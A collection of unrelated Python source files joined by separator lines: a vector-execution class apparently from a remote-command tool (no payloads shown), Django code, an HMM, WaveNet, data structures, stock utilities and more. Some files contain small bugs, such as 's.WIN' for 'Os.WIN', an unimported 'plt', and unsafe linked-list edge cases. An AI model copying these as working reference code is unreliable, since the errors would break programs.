""" Execute all the vectors and return the first result matching the given condition.
Return the name and the result of the first vector execution response that satisfy
the given condition.
With unspecified names, execute all the vectors. Optionally store results.
Exceptions triggered checking condition function are catched and logged.
Args:
names (list of str): The list of names of vectors to execute.
format_args (dict): The arguments dictionary used to format the vectors with.
condition (function): The function or lambda to check certain conditions on result.
Must returns boolean.
store_result (bool): Store as result.
store_name (str): Store the found vector name in the specified argument.
Returns:
Tuple. Contains the vector name and execution result in the
`( vector_name, result )` form.
"""
if not callable(condition):
raise DevException(messages.vectors.wrong_condition_type)
if not isinstance(store_name, str):
raise DevException(messages.vectors.wrong_store_name_type)
for vector in self:
# Skip with wrong vectors
if not self._os_match(vector.target): continue
# Clean names filter from empty objects
names = [ n for n in names if n ]
# Skip if names filter is passed but current vector is missing
if names and not any(n in vector.name for n in names): continue
# Add current vector name
format_args['current_vector'] = vector.name
# Run
result = vector.run(format_args)
# See if condition is verified
try:
condition_result = condition(result)
except Exception as e:
import traceback; log.info(traceback.format_exc())
log.debug(messages.vectorlist.vector_s_triggers_an_exc % vector.name)
condition_result = False
# Eventually store result or vector name
if condition_result:
if store_result:
self.session[self.module_name]['results'][vector.name] = result
if store_name:
self.session[self.module_name]['stored_args'][store_name] = vector.name
return vector.name, result
return None, None
def get_result(self, name, format_args = {}, store_result = False):
"""Execute one vector and return the result.
Run the vector with specified name. Optionally store results.
Args:
name (str): The name of vector to execute.
format_args (dict): The arguments dictionary used to format the vectors with.
store_result (bool): Store result in session.
Returns:
Object. Contains the vector execution result.
"""
vector = self.get_by_name(name)
if vector and self._os_match(vector.target):
# Add current vector name
format_args['current_vector'] = vector.name
result = vector.run(format_args)
if store_result:
self.session[self.module_name]['results'][name] = result
return result
def get_results(self, names = [], format_args = {}, results_to_store = [ ]):
"""Execute all the vectors and return the results.
With unspecified names, execute all the vectors. Optionally store results.
Returns a dictionary with results.
Args:
names (list of str): The list of names of vectors to execute.
format_args (dict): The arguments dictionary used to format the vectors with.
results_to_store (list of str): The list of names of the vectors which
store the execution result.
Returns:
Dictionary. Contains all the vector results in the
`{ vector_name : result }` form.
"""
response = {}
for vector in self:
if not self._os_match(vector.target): continue
if names and not any(x in vector.name for x in names): continue
# Add current vector name
format_args['current_vector'] = vector.name
response[vector.name] = vector.run(format_args)
if not any(x in vector.name for x in results_to_store): continue
self.session[self.module_name]['results'][vector.name] = response[vector.name]
return response
def _os_match(self, os):
"""Check if vector os is compatible with the remote os."""
os_string = self.session['system_info']['results'].get('os')
# If os_string is not set, just return True and continue
if not os_string: return True
os_current = s.WIN if os_string.lower().startswith('win') else Os.NIX
return os in (os_current, Os.ANY)
def get_by_name(self, name):
"""Get the vector object by name.
Args:
name (str): the name of the requested vector.
Returns:
Vector object.
"""
return next((v for v in self if v.name == name), None)
def get_names(self):
"""Get the vectors names.
Returns:
List of strings. Contain vectors names.
"""
return [ v.name for v in self ]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Destaque',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('titulo', models.CharField(max_length=100, verbose_name=b'T\xc3\xadtulo')),
('descricao', models.TextField(verbose_name=b'Descri\xc3\xa7\xc3\xa3o', blank=True)),
('imagem', models.ImageField(upload_to=b'imagens/destaques', blank=True)),
],
options={
'verbose_name': 'Destaque',
'verbose_name_plural': 'Destaques',
},
),
]
|
from django.shortcuts import render
from django.http import HttpResponse
import pandas as pd
from .models import Dataset
from .forms import ModelFormCSVFile
def home(request):
question = 1
return render(request, 'analyst/home.html', {'question': question})
def data(request):
if request.method == 'POST':
#delete
print (request.POST['deleteid'])
if int(request.POST['deleteid'])>0:
ds = Dataset.objects.get(id = request.POST['deleteid'])
ds.delete()
form = ModelFormCSVFile()
#add
else:
form = ModelFormCSVFile(request.POST, request.FILES)
if form.is_valid():
print (request.POST)
ds = Dataset(name=request.POST['name'], content = request.FILES['csvfile'])
ds.save()
else:
form = ModelFormCSVFile()
datasets = Dataset.objects.order_by('-name')
context = {'datasets': datasets, 'form': form}
return render(request, 'analyst/data.html', context)
def dataallentries(request, data_id):
ds = Dataset.objects.get(id =data_id)
df = pd.read_json(ds.content)
content = df.to_html(classes=['table', 'table-striped'])
context = {'content':content}
return render(request, 'analyst/data_allentries.html', context)
|
def fibonaci_gen(limit):
a, b = 0, 1
for i in range(limit):
yield b
a, b = b, a + b
print([value for value in fibonaci_gen(10)])
|
"""
The implementation of hidden markov model using tensorflow for multiple sequences of discrete observations.
This implementation is simpler than the original version.
The tutorial of the original version can be found here: https://web.stanford.edu/~jurafsky/slp3/A.pdf
"""
import csv
from multiprocessing import current_process
import numpy as np
import pandas as pd
import tensorflow as tf
from graphviz import Digraph
class HMMD_TF:
def __init__(self):
pass
def declare_variables(self, n_hidden_states, vocabulary):
# create sequences
tf_sequences = []
for sequence in self.sequences:
tf_sequence = tf.compat.v1.placeholder(shape=(len(sequence),), dtype=tf.int32)
tf_sequences.append(tf_sequence)
# create initial probability matrix
tf_pi = tf.Variable(initial_value=tf.random.normal(shape=(1, n_hidden_states)), dtype=tf.float32,
name='pi')
tf_pi = tf.nn.softmax(tf_pi) # this ensures that sum of pi elements is equal to 1
# create probability transaction matrix
tf_A = tf.Variable(
initial_value=tf.random.normal(shape=(n_hidden_states, n_hidden_states)),
dtype=tf.float32, name='A')
tf_A = tf.nn.softmax(tf_A, axis=1)
# create emission matrix
n_symbols = len(vocabulary)
tf_B = tf.Variable(initial_value=tf.random.normal(shape=(n_hidden_states, n_symbols)),
dtype=tf.float32, name='B')
tf_B = tf.nn.softmax(tf_B, axis=1)
return tf_sequences, tf_pi, tf_A, tf_B
def fit(self, sequences, vocabulary, weight_file_prefix, n_hidden_states, prefix, max_iterations=20000,
convergence_threshold=1e-10):
self.process_name = prefix + '[' + current_process().name + ']'
self.vocabulary = vocabulary
self.sequences = sequences
self.n_hidden_states = n_hidden_states
self.tf_sequences, self.tf_pi, self.tf_A, self.tf_B = self.declare_variables(self.n_hidden_states,
self.vocabulary)
# Define the cost of hidden markov model
# We need to find A, and B to minimize the cost.
tf_cost = 0
for idx, sequence in enumerate(self.sequences):
last_anpha = self.compute_anpha(self.tf_A, self.tf_B, self.tf_pi, self.tf_sequences[idx], len(sequence))
tf_cost += tf.math.log(tf.reduce_sum(last_anpha))
tf_cost = -tf_cost
# set adaptive learning rate algorithm
train_op = tf.compat.v1.train.AdamOptimizer(1e-3).minimize(tf_cost)
# create feed-dict input
feed_dict = dict()
for idx, sequence in enumerate(sequences):
feed_dict[self.tf_sequences[idx]] = sequences[idx]
# training
with tf.compat.v1.Session() as session:
session.run(tf.compat.v1.global_variables_initializer())
cost_arr = []
for i in range(max_iterations):
session.run(train_op, feed_dict)
cost = session.run(tf_cost, feed_dict)
cost_arr.append(cost)
print(f'{self.process_name} iteration {i}: cost = {cost}')
# save the current value of hyperparameters to file
if i % 50 == 0 or i == max_iterations - 1:
self.A = session.run(self.tf_A, feed_dict)
self.B = session.run(self.tf_B, feed_dict)
self.pi = session.run(self.tf_pi, feed_dict)
print(f'{self.process_name} Export hyperparameters to file')
self.save(weight_file_prefix)
# check convergence
if len(cost_arr) >= 2:
delta = np.abs(cost_arr[-2] - cost_arr[-1])
print(f'{self.process_name} delta = {delta}')
if delta <= convergence_threshold:
# converge now
print(f'{self.process_name} Converge now. Stop!')
break
def compute_anpha(self, tf_A, tf_B, tf_pi, tf_sequence, T):
'''
Compute anpha
:param tf_A: the tensorflow variable of transaction probability matrix
:param tf_B: the tensorflow variable of emission matrix
:param tf_pi: the tensorflow variable of initial probability matric
:param tf_sequence: the tensorflow variable of 1D array
:param T: length of the input sequence
:return: the last anpha
'''
last_anpha = tf.math.multiply(tf_pi, tf_B[:, tf_sequence[0]]) # 1xN
for t in range(1, T):
last_anpha = tf.multiply(tf.matmul(last_anpha, tf_A), tf_B[:, tf_sequence[t]]) # 1xN
return last_anpha
def find_symbol(self, vocabulary, index_symbol):
for k, v in vocabulary.items():
if v == index_symbol:
return k
def draw(self):
"""
Draw HMM after finishing the training process
:return:
"""
dot = Digraph(comment='hmm')
# create hidden state nodes
for i in range(self.n_hidden_states):
dot.node('s' + str(i), 'state ' + str(i))
# create nodes in vocabulary
for i in range(self.B.shape[1]):
dot.node('o' + str(i), 'symbol ' + str(self.find_symbol(self.vocabulary, i)))
# add weights
for i in range(self.A.shape[0]):
for j in range(self.A.shape[1]):
dot.edge('s' + str(i), 's' + str(j), label=str(self.A[i, j]))
for i in range(self.B.shape[0]):
for j in range(self.B.shape[1]):
dot.edge('s' + str(i), 'o' + str(j), label=str(self.B[i, j]))
dot.attr(label='#sequences = ' + str(len(self.sequences)))
dot.render('../../graph-output/hmm_graph.gv', view=True)
def save(self, matrix_prefix):
'''
:param matrix_prefix: Example: "../hmm1_"
:return:
'''
assert (len(matrix_prefix) > 0)
assert (self.A.shape[0] == self.A.shape[1])
with open(str(matrix_prefix) + 'logA.csv', 'w') as csvfile:
writer = csv.writer(csvfile)
[writer.writerow(np.log(r)) for r in self.A]
with open(str(matrix_prefix) + 'logB.csv', 'w') as csvfile:
writer = csv.writer(csvfile)
[writer.writerow(np.log(r)) for r in self.B]
assert (self.pi.shape[0] > 0)
with open(str(matrix_prefix) + 'logpi.csv', 'w') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(self.pi[0])
with open(str(matrix_prefix) + 'vocabulary.csv', 'w') as csvfile:
writer = csv.writer(csvfile)
for k, v in self.vocabulary.items():
writer.writerow([k, v])
def read(self, A_path, B_path, pi_path, vocabulary_path):
A = np.e ** (pd.read_csv(A_path, header=None).to_numpy())
B = np.e ** (pd.read_csv(B_path, header=None).to_numpy())
pi = np.e ** (pd.read_csv(pi_path, header=None).to_numpy())
v = pd.read_csv(vocabulary_path, header=None)
vocabulary = dict()
for idx in range(len(v)):
key = v.at[idx, 0]
value = v.at[idx, 1]
vocabulary[key] = value
# A and B is stored in log
self.A = A
self.B = B
self.pi = pi
self.vocabulary = vocabulary
self.n_hidden_states = A.shape[0]
return A, B, pi, vocabulary
def convertSequences2Index(self, X, vocabulary, split_level='CHARACTER'):
assert (len(vocabulary) > 0)
X_transform = []
for x in X:
# split sequence into fragments
tokens = []
if split_level == 'CHARACTER':
tokens = [character for character in x]
elif split_level == 'WORD':
tokens = x.split(' ')
x_transform = np.zeros(shape=(len(tokens),))
# convert X to symbol
for idx, token in enumerate(tokens):
# ignore if word does not exist in the vocabulary
for key, value in vocabulary.items():
if key == token:
x_transform[idx] = value
break
x_transform = x_transform.astype(dtype='int')
X_transform.append(x_transform)
return X_transform
def compute_likelihood(self, X, split_level='CHARACTER'):
likelihood_arr = []
X_transform = self.convertSequences2Index(X, self.vocabulary, split_level)
for x, x_transform in zip(X, X_transform):
#print(f"x = {x} / x_transform = {x_transform}")
# compute anpha
last_anpha = np.multiply(self.pi, self.B[:, x_transform[0]]) # 1xN
for t in range(1, len(x_transform)):
last_anpha = np.multiply(np.matmul(last_anpha, self.A), self.B[:, x_transform[t]]) # 1xN
# likelihood = sum of the last anpha
likelihood = np.sum(last_anpha)
likelihood_arr.append(likelihood)
return likelihood_arr
def load_data(self, experiments, split_level='CHARACTER'):
sequences = []
vocabulary = dict()
for idx, experiment in enumerate(experiments):
# define how to split a sequence into fragments
T = 0
if split_level == 'CHARACTER':
T = len(experiment)
elif split_level == 'WORD':
experiment = experiment.split(' ')
T = len(experiment)
sequence = np.zeros(shape=(T,))
# iterate over the fragments
for trial_idx in range(0, T):
trial = experiment[trial_idx]
if not trial in vocabulary:
vocabulary[trial] = len(vocabulary)
sequence[trial_idx] = vocabulary[trial]
sequence = sequence.astype(dtype='int')
sequences.append(sequence)
return sequences, vocabulary
if __name__ == '__main__':
np.set_printoptions(suppress=True)
# Step 1. train HMM
# The value of hyperparameters (e.g., A, B, pi) will be stored in external files for further usages.
hmm = HMMD_TF() # we can choose a different number of hidden states
# the size of vocaburary = 2 (i.e., T means tail, H means head)
experiments = ["TTTTTTTTTTTTTTTTTTTTTTTTTTTHTTTT", "HHHHHHHHHHHHHHHTHHHHHHHHH"]
sequences, vocabulary = hmm.load_data(experiments, split_level='CHARACTER')
hmm.fit(sequences, vocabulary, n_hidden_states=2, weight_file_prefix='../hmm_', prefix='')
hmm.draw()
# Step 2. test HMM
# You can load hyperparameter files without training anymore.
print('Test. Read weights from file')
hmm2 = HMMD_TF() # no need to specify the number of hidden states
hmm2.read(A_path='../hmm_logA.csv', B_path='../hmm_logB.csv', pi_path='../hmm_logpi.csv',
vocabulary_path='../hmm_vocabulary.csv')
Xtest = ["THTHTHTHTHTHTHTHTHTHTH",
"TTTTTTTTTTTTTTTTTTTTTT",
"HHHHHHHHHHHHHHHHHHHHHH",
"TTTTTTTTTHTTTTTTTTTTTT",
"TTTTTTTTTHTTTTTTHTTTTTT"]
likelihood_arr = hmm2.compute_likelihood(Xtest, split_level='CHARACTER')
for sequence, likelihood in zip(Xtest, likelihood_arr):
print(f'Test {sequence} : probability = {likelihood} (log of probability = {np.log(likelihood)})')
|
from time import time
from utils import make_batch
from models import WaveNet, Generator
from IPython.display import Audio
import matplotlib.pyplot as plt
import librosa.display
import numpy as np
inputs, targets = make_batch('./voice.wav')
output_path = './output.wav'
num_time_samples = inputs.shape[1]
num_channels = 1
gpu_fraction = 1
# sample_rate = 44100
sample_rate = 32000
y, sr = librosa.load('./voice.wav', duration=5.0)
print(y.shape)
print(sr)
# librosa.output.write_wav('./file_trim_5s.wav', y, sr)
model = WaveNet(num_time_samples=num_time_samples, num_channels=num_channels, gpu_fraction=gpu_fraction)
print('inputs.shape = ', inputs.shape)
Audio(inputs.reshape(inputs.shape[1]), rate=44100)
print('inputs.shape = ', inputs.shape)
print('targets.shape = ', targets.shape)
tic = time()
model.test(inputs, targets)
toc = time()
print('Training time = {} seconds'.format(toc-tic))
generator = Generator(model)
input_ = inputs[:, 0:1, 0]
tic = time()
predictions = generator.run(input_, sample_rate)
Audio(predictions, rate=44100)
# print('prediction.shape = ', predictions.shape)
# predictions_output = predictions[0, :]
# print('predictions_output.shape=', predictions_output.shape)
# toc = time()
# print('Sampling time = {} seconds'.format(toc-tic))
# print('Completed sampling rate = {}'.format(predictions.shape[1]))
# librosa.output.write_wav(output_path, predictions[0, :], sample_rate)
# wav_out = predictions_output.astype(dtype=np.float16)
# librosa.output.write_wav(output_path, wav_out, 22050)
# print('Output signal saved to {} successfully'.format(output_path))
# from scipy.io import wavfile
# # wav_out = np.asarray(predictions_output)
# wav_out = predictions.astype(dtype=np.int16)
# wavfile.write('./testout.wav', 44100, wav_out)
# librosa.display.waveplot(predictions[0, :], sr=sample_rate)
# plt.show()
# X = librosa.stft(predictions[0, :])
# Xdb = librosa.amplitude_to_db(abs(X))
# librosa.display.specshow(Xdb, sr=sample_rate, x_axis='time', y_axis='hz')
# plt.show()
|
"""
These are comment related models.
"""
from dataclasses import dataclass, field
from typing import List, Optional
from .base import BaseModel
from .mixins import DatetimeTimeMixin
from .common import BaseApiResponse, BaseResource
@dataclass
class CommentSnippetAuthorChannelId(BaseModel):
"""
A class representing comment's snippet authorChannelId info.
Refer: https://developers.google.com/youtube/v3/docs/comments#snippet.authorChannelId
"""
value: Optional[str] = field(default=None)
@dataclass
class CommentSnippet(BaseModel, DatetimeTimeMixin):
"""
A class representing comment's snippet info.
Refer: https://developers.google.com/youtube/v3/docs/comments#snippet
"""
authorDisplayName: Optional[str] = field(default=None)
authorProfileImageUrl: Optional[str] = field(default=None, repr=False)
authorChannelUrl: Optional[str] = field(default=None, repr=False)
authorChannelId: Optional[CommentSnippetAuthorChannelId] = field(
default=None, repr=False
)
channelId: Optional[str] = field(default=None, repr=False)
videoId: Optional[str] = field(default=None, repr=False)
textDisplay: Optional[str] = field(default=None, repr=False)
textOriginal: Optional[str] = field(default=None, repr=False)
parentId: Optional[str] = field(default=None, repr=False)
canRate: Optional[bool] = field(default=None, repr=False)
viewerRating: Optional[str] = field(default=None, repr=False)
likeCount: Optional[int] = field(default=None)
moderationStatus: Optional[str] = field(default=None, repr=False)
publishedAt: Optional[str] = field(default=None, repr=False)
updatedAt: Optional[str] = field(default=None, repr=False)
@dataclass
class Comment(BaseResource):
"""
A class representing comment info.
Refer: https://developers.google.com/youtube/v3/docs/comments
"""
snippet: Optional[CommentSnippet] = field(default=None)
@dataclass
class CommentListResponse(BaseApiResponse):
"""
A class representing the comment's retrieve response info.
Refer: https://developers.google.com/youtube/v3/docs/comments/list#response_1
"""
items: Optional[List[Comment]] = field(default=None, repr=False)
|
'''
双向链表
'''
# -*- coding:utf-8 -*-
class Node(object):
def __init__(self, data, _prev=None, _next=None):
self.data = data
self._prev = _prev
self._next = _next
class DoubleLinkedList(object):
'''
方法:
insert_new_value_to_head 在头部插入新结点
insert_new_value_after_target_node 在给定结点后
插入新结点
insert_new_value_before_target_node 在给定结点前插入新结点
delete_target_node 删除给定结点
print_double_linked_list 打印链表信息
get_node_by_value 返回给定结点
'''
def __init__(self, node=None):
self._head = node
def insert_new_value_to_head(self, value):
new_node = Node(value)
current = self._head
if current == None:
self._head = new_node
else:
new_node._next = self._head
self._head._prev = new_node
self._head = new_node
new_node._prev = None
def insert_new_value_after_target_node(self, target_node, value):
new_node = Node(value)
new_node._next = target_node._next
target_node._next._prev = new_node
target_node._next = new_node
new_node._prev = target_node
def insert_new_value_before_target_node(self, target_node, value):
new_node = Node(value)
new_node._prev = target_node._prev
target_node._prev._next = new_node
new_node._next = target_node
target_node._prev = new_node
def delete_target_node(self, target_node):
target_node._next._prev = target_node._prev
target_node._prev._next = target_node._next
def print_double_linked_list(self):
current = self._head
while current:
if current == self._head:
print(f"{current.data}", end="")
else:
print(f"⇄{current.data}", end="")
current = current._next
def get_node_by_value(self, value):
current = self._head
while current and current.data != value:
current = current._next
'''
下述两种返回形式都可以:
因为在非循环链表中,遍历整个链表依然没有目标值后,其最终指向地址都是None
而循环链表中,遍历到链表结尾后,其最终指向地址不会是None,所以要手动判断一下
'''
return current
if current:
return current
else:
return
if __name__ == '__main__':
dl = DoubleLinkedList()
dl.insert_new_value_to_head(1)
dl.insert_new_value_to_head(2)
# dl.print_double_linked_list()
'''
# test data2
data2 = dl.get_node_by_value(2)
print(data2._prev)
print(data2.data)
print(data2._next.data)
'''
'''
# test data1
data1 = dl.get_node_by_value(1)
print(data1._prev.data)
print(data1.data)
print(data1._next)
'''
# 在数据2后插入新结点
data2 = dl.get_node_by_value(2)
dl.insert_new_value_after_target_node(data2, 3)
dl.insert_new_value_after_target_node(data2, 4)
dl.print_double_linked_list()
# 删除数据4这个结点
data4 = dl.get_node_by_value(6)
print(data4)
# dl.delete_target_node(data4)
exit()
'''
# 在数据1前插入新结点
data1 = dl.get_node_by_value(1)
dl.insert_new_value_before_target_node(data1, 3)
dl.insert_new_value_before_target_node(data1, 4)
'''
dl.print_double_linked_list()
|
import os
import json
from notebook_rendering import Notebook
def test_notebook_render(tmpdir):
output_path = os.path.join(tmpdir, 'notebook.ipynb')
input_path = 'tests/files/hello.ipynb'
with open(input_path, 'r') as file:
actual = json.load(file)['cells']
expected = [
{
'cell_type': 'code',
'execution_count': None,
'metadata': {'collapsed': True},
'outputs': [],
'source': ["print('Hello, World!')"]
}
]
assert actual == expected
notebook = Notebook(input_path, 'python3')
notebook.render(output_path)
assert os.path.exists(output_path)
with open(output_path, 'r') as file:
actual = json.load(file)['cells']
expected = [
{
'cell_type': 'code',
'execution_count': 1,
'metadata': {'collapsed': True},
'outputs': [
{
'name': 'stdout',
'output_type': 'stream',
'text': ['Hello, World!\n']
}
],
'source': ["print('Hello, World!')"]
}
]
assert actual == expected
def test_notebook_render_html(tmpdir):
output_path = os.path.join(tmpdir, 'notebook.html')
input_path = 'tests/files/hello.ipynb'
notebook = Notebook(input_path, 'python3')
notebook.render(output_path, 'html')
assert os.path.exists(output_path)
with open(output_path, 'r') as file:
actual = file.read()
expected_head = '''<!DOCTYPE html>
<html>
<head><meta charset="utf-8" />
<title>hello</title>'''
assert actual.startswith(expected_head)
|
"""Util functions for StrategyLearner."""
import datetime as dt
import os
import pandas as pd
import numpy as np
def symbol_to_path(symbol, base_dir=None):
"""Return CSV file path given ticker symbol."""
if base_dir is None:
base_dir = os.environ.get("MARKET_DATA_DIR", '../data/')
return os.path.join(base_dir, "{}.csv".format(str(symbol)))
def get_data(symbols, dates, addSPY=True, colname = 'Adj Close'):
"""Read stock data (adjusted close) for given symbols from CSV files."""
df = pd.DataFrame(index=dates)
if addSPY and 'SPY' not in symbols: # add SPY for reference, if absent
symbols = ['SPY'] + symbols
for symbol in symbols:
df_temp = pd.read_csv(symbol_to_path(symbol), index_col='Date',
parse_dates=True, usecols=['Date', colname], na_values=['nan'])
df_temp = df_temp.rename(columns={colname: symbol})
df = df.join(df_temp)
if symbol == 'SPY': # drop dates SPY did not trade
df = df.dropna(subset=["SPY"])
return df
def get_orders_data_file(basefilename):
return open(os.path.join(os.environ.get("ORDERS_DATA_DIR",'orders/'),basefilename))
def get_learner_data_file(basefilename):
return open(os.path.join(os.environ.get("LEARNER_DATA_DIR",'Data/'),basefilename),'r')
def get_robot_world_file(basefilename):
return open(os.path.join(os.environ.get("ROBOT_WORLDS_DIR",'testworlds/'),basefilename))
def normalize_data(df):
"""Normalize stock prices using the first row of the dataframe"""
return df/df.iloc[0,:]
def compute_daily_returns(df):
"""Compute and return the daily return values"""
daily_returns = df.pct_change()
daily_returns.iloc[0,:] = 0
return daily_returns
def compute_sharpe_ratio(k, avg_return, risk_free_rate, std_return):
"""
Compute and return the Sharpe ratio
Parameters:
k: adjustment factor, sqrt(252) for daily data, sqrt(52) for weekly data, sqrt(12) for monthly data
avg_return: daily, weekly or monthly return
risk_free_rate: daily, weekly or monthly risk free rate
std_return: daily, weekly or monthly standard deviation
Returns:
sharpe_ratio: k * (avg_return - risk_free_rate) / std_return
"""
return k * (avg_return - risk_free_rate) / std_return
def plot_data(df, title="Stock prices", xlabel="Date", ylabel="Price", save_fig=False, fig_name="plot.png"):
"""Plot stock prices with a custom title and meaningful axis labels."""
ax = df.plot(title=title, fontsize=12)
ax.set_xlabel(xlabel)
ax.set_ylabel(ylabel)
if save_fig == True:
plt.savefig(fig_name)
else:
plt.show()
def load_txt_data(dirpath, filename):
""" Load the data from a txt file and store them as a numpy array
Parameters:
dirpath: The path to the directory where the file is stored
filename: The name of the file in the dirpath
Returns:
np_data: A numpy array of the data
"""
try:
filepath= os.path.join(dirpath, filename)
except KeyError:
print ("The file is missing")
np_data = np.loadtxt(filepath, dtype=str)
return np_data
def get_exchange_days(start_date = dt.datetime(1964,7,5), end_date = dt.datetime(2020,12,31),
dirpath = "../data/dates_lists", filename="NYSE_dates.txt"):
""" Create a list of dates between start_date and end_date (inclusive) that correspond
to the dates there was trading at an exchange. Default values are given based on NYSE.
Parameters:
start_date: First timestamp to consider (inclusive)
end_date: Last day to consider (inclusive)
dirpath: The path to the directory where the file is stored
filename: The name of the file in the dirpath
Returns:
dates: A list of dates between start_date and end_date on which an exchange traded
"""
# Load a text file located in dirpath
dates_str = load_txt_data(dirpath, filename)
all_dates_frome_file = [dt.datetime.strptime(date, "%m/%d/%Y") for date in dates_str]
df_all_dates = pd.Series(index=all_dates_frome_file, data=all_dates_frome_file)
selected_dates = [date for date in df_all_dates[start_date:end_date]]
return selected_dates
def get_data_as_dict(dates, symbols, keys):
""" Create a dictionary with types of data (Adj Close, Volume, etc.) as keys. Each value is
a dataframe with symbols as columns and dates as rows
Parameters:
dates: A list of dates of interest
symbols: A list of symbols of interest
keys: A list of types of data of interest, e.g. Adj Close, Volume, etc.
Returns:
data_dict: A dictionary whose keys are types of data, e.g. Adj Close, Volume, etc. and
values are dataframes with dates as indices and symbols as columns
"""
data_dict = {}
for key in keys:
df = pd.DataFrame(index=dates)
for symbol in symbols:
df_temp = pd.read_csv(symbol_to_path(symbol), index_col="Date",
parse_dates=True, usecols=["Date", key], na_values=["nan"])
df_temp = df_temp.rename(columns={key: symbol})
df = df.join(df_temp)
data_dict[key] = df
return data_dict
def create_df_benchmark(symbol, start_date, end_date, num_shares):
"""Create a dataframe of benchmark data. Benchmark is a portfolio consisting of
num_shares of the symbol in use and holding them until end_date.
"""
# Get adjusted close price data
benchmark_prices = get_data([symbol], pd.date_range(start_date, end_date),
addSPY=False).dropna()
# Create benchmark df: buy num_shares and hold them till the last date
df_benchmark_trades = pd.DataFrame(
data=[(benchmark_prices.index.min(), num_shares),
(benchmark_prices.index.max(), -num_shares)],
columns=["Date", "Shares"])
df_benchmark_trades.set_index("Date", inplace=True)
return df_benchmark_trades
def create_df_trades(orders, symbol, num_shares, cash_pos=0, long_pos=1, short_pos=-1):
"""Create a dataframe of trades based on the orders executed. +1000
indicates a BUY of 1000 shares, and -1000 indicates a SELL of 1000 shares.
"""
# Remove cash positions to make the "for" loop below run faster
non_cash_orders = orders[orders != cash_pos]
trades = []
for date in non_cash_orders.index:
if non_cash_orders.loc[date] == long_pos:
trades.append((date, num_shares))
elif non_cash_orders.loc[date] == short_pos:
trades.append((date, -num_shares))
df_trades = pd.DataFrame(trades, columns=["Date", "Shares"])
df_trades.set_index("Date", inplace=True)
return df_trades
|
from django.shortcuts import render
def main(request):
context = {'like': 'Django很棒'}
return render(request, 'main/main.html', context)
def about(request):
context = {'range10': range(10)}
return render(request, 'main/about.html', context)
|
# Generated by Django 2.2.1 on 2019-05-19 20:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('events', '0005_auto_20190519_1542'),
]
operations = [
migrations.AddField(
model_name='event',
name='event_description',
field=models.TextField(blank=True, help_text='Brief description of event.'),
),
]
|
import numpy as np
def nullspace(A, atol=1e-13, rtol=0):
u, d, v = np.linalg.svd(A)
rank = (d>1e-13).sum()
e = v[rank:].conj().T
return(e/e[2])
def findEpipole(A):
return nullspace(A.T)
if __name__ == "__main__":
F = np.array([[-1.29750186e-06, 8.07894025e-07, 1.84071967e-03],
[3.54098411e-06, 1.05620725e-06, -8.90168709e-03],
[-3.29878312e-03, 5.14822628e-03, 1.00000000e+00]])
print(findEpipole(F))
|
class Fraction:
""" class Fraction """
def __init__(self, N, D):
self.num = N
self.den = D
def __str__(self):
# user by print(varibale)
res = str(self.num) + "/" + str(self.den)
return res
def __repr__(self):
# user by varibale without print(varibale)
# return self.__str__()
res = str(self.num) + " repr"
return res
def __mul__(self, autre):
return Fraction(self.num * autre.num , self.den * autre.den)
def __add__(self, autre):
return Fraction(self.num * autre.den + autre.num * self.den , self.den * autre.den)
def __sub__(self, autre):
return Fraction(self.num * autre.den - autre.num * self.den , self.den * autre.den)
def __truediv__(self, autre):
return Fraction(self.num * autre.den , self.den * autre.num)
def coucou(self):
""" coucou """
return "coucou " + str(self.num)
def coucou2(self):
""" coucou2 """
return "coucou2 " + str(self.num)
f1 = Fraction(3, 4)
print(type(f1))
print(dir(f1))
print(f1.num)
print(f1)
print(f1.coucou())
f2 = Fraction(1, 4)
print(f1 * f2)
print(f1 + f2)
print(f1 - f2)
print(f1 / f2)
|
import feature_extraction
from sklearn.feature_extraction import FeatureHasher
import common
import sys
import numpy as np
if __name__ == '__main__':
X,y = common.generate_ucf_dataset('frames')
|
from os import listdir
import cv2 as cv
import numpy as np
from os import path, makedirs
import math
import matplotlib.pyplot as plt
import argparse
import tqdm
import tensorflow as tf
import time
import threading
from guided_filter import guided_filter_cv as guided_filter
class bbox:
def __init__(self, lt, rb):
self.lt = [lt[0], lt[1]]
self.rb = [rb[0], rb[1]]
def is_val(self, img_shape):
l_val = self.lt[0] >= 0
t_val = self.lt[1] >= 0
r_val = self.rb[0] < img_shape[0]
b_val = self.rb[1] < img_shape[1]
if l_val and t_val and r_val and b_val:
return True
else:
return False
def get_crop(self, img):
if self.is_val(img.shape):
return img[self.lt[0]:self.rb[0]+1, self.lt[1]:self.rb[1]+1]
else:
return None
def random_shift(self, img_shape, max_shift):
# choose left/right and top/bottom
shift_choose = np.random.randint(2, size=(2))
#### Left / Right ####
if shift_choose[0] is 0: # shift left
tmp_max = min(max_shift, self.lt[0])
if tmp_max > 0:
tmp_shift = np.random.randint(tmp_max)
self.lt[0] = self.lt[0] - tmp_shift
self.rb[0] = self.rb[0] - tmp_shift
else: # shift right
tmp_max = min(max_shift, img_shape[0] - self.rb[0] - 1)
if tmp_max > 0:
tmp_shift = np.random.randint(tmp_max)
self.lt[0] = self.lt[0] + tmp_shift
self.rb[0] = self.rb[0] + tmp_shift
#### Lop / Bottom ####
if shift_choose[1] is 0: # shift top
tmp_max = min(max_shift, self.lt[1])
if tmp_max > 0:
tmp_shift = np.random.randint(tmp_max)
self.lt[1] = self.lt[1] - tmp_shift
self.rb[1] = self.rb[1] - tmp_shift
else: # shift bottom
tmp_max = min(max_shift, img_shape[1] - self.rb[1] - 1)
if tmp_max > 0:
tmp_shift = np.random.randint(tmp_max)
self.lt[1] = self.lt[1] + tmp_shift
self.rb[1] = self.rb[1] + tmp_shift
def shift(self, shift_size):
shifted = bbox(self.lt, self.rb)
shifted.lt[0] = shifted.lt[0] + shift_size[0]
shifted.lt[1] = shifted.lt[1] + shift_size[1]
shifted.rb[0] = shifted.rb[0] + shift_size[0]
shifted.rb[1] = shifted.rb[1] + shift_size[1]
return shifted
def __repr__(self):
tmp = f"LT: {self.lt}, RB: {self.rb}"
return tmp
def rotate_Fg_Alpha(fg, alpha, angle):
def rotatedRectWithMaxArea(w, h, angle):
"""
https://stackoverflow.com/questions/16702966/rotate-image-and-crop-out-black-borders
Given a rectangle of size wxh that has been rotated by 'angle' (in
radians), computes the width and height of the largest possible
axis-aligned rectangle (maximal area) within the rotated rectangle.
"""
